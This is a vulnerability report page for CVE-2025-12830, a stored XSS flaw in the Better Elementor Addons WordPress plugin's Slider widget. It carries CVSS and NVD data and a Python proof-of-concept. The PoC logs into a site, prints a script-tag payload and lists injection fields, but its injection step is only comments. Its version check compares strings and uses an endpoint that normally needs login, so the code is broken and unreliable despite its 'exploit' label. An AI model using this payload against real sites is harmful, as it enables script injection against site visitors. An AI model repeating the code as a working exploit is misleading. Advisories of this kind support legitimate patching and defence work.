Security Vulnerability Report
中文
CVE-2025-12830 CVSS 6.4 MEDIUM

CVE-2025-12830

Published: 2025-12-12 04:15:40
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Better Elementor Addons < 1.5.5

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys from bs4 import BeautifulSoup # CVE-2025-12830 PoC - Better Elementor Addons Stored XSS # Target: WordPress site with Better Elementor Addons plugin <= 1.5.5 def exploit_stored_xss(target_url, username, password): """ Exploit the Stored XSS vulnerability in Better Elementor Addons Slider widget This PoC demonstrates how an authenticated contributor+ user can inject XSS payload """ # XSS payload - can be placed in various Slider attributes xss_payload = '<script>console.log("XSS Triggered - CVE-2025-12830")</script>' # Step 1: Login to WordPress session = requests.Session() login_url = f"{target_url}/wp-login.php" login_data = { 'log': username, 'pwd': password, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/' } response = session.post(login_url, data=login_data, allow_redirects=True) if 'wordpress_logged_in' not in session.cookies.get_dict(): print("[-] Login failed") return False print("[+] Login successful") # Step 2: Create or edit a page with Elementor # This would require Elementor Editor API interaction # The actual exploitation happens when adding a Slider widget with XSS in attributes # Example XSS injection points in Slider widget: # - Slider link URL field # - Slide title/description fields # - Image alt text # - Custom CSS classes print("[*] XSS Payload to inject:", xss_payload) print("[*] Injection point: Slider widget attributes in Elementor editor") print("[*] Required permission: Contributor or higher") # Step 3: Verify the stored XSS # After saving, any user viewing the page will trigger the XSS return True def verify_vulnerability(target_url): """ Verify if the target is vulnerable by checking plugin version """ # Check plugin version via WordPress API plugin_info_url = f"{target_url}/wp-json/wp/v2/plugins/better-elementor-addons" try: response = requests.get(plugin_info_url) if response.status_code == 200: data = response.json() version = data.get('version', 'unknown') print(f"[*] Detected Better Elementor Addons version: {version}") if version and version <= '1.5.5': print("[!] Target appears to be vulnerable") return True except: pass print("[*] Could not determine plugin version") return False if __name__ == "__main__": if len(sys.argv) < 4: print("Usage: python cve-2025-12830-poc.py <target_url> <username> <password>") sys.exit(1) target = sys.argv[1] user = sys.argv[2] pwd = sys.argv[3] print(f"[*] Testing CVE-2025-12830 on {target}") if verify_vulnerability(target): exploit_stored_xss(target, user, pwd)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12830", "sourceIdentifier": "[email protected]", "published": "2025-12-12T04:15:40.130", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Better Elementor Addons plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Slider widget in all versions up to, and including, 1.5.5 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style1.php#L19", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style2.php#L17", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/better-elementor-addons/tags/1.5.4/widgets/slider/styles/style5.php#L12", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3432917%40better-elementor-addons&new=3432917%40better-elementor-addons&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/better-elementor-addons/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d714d740-d7e0-49fd-af08-b4a80c9d0599?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.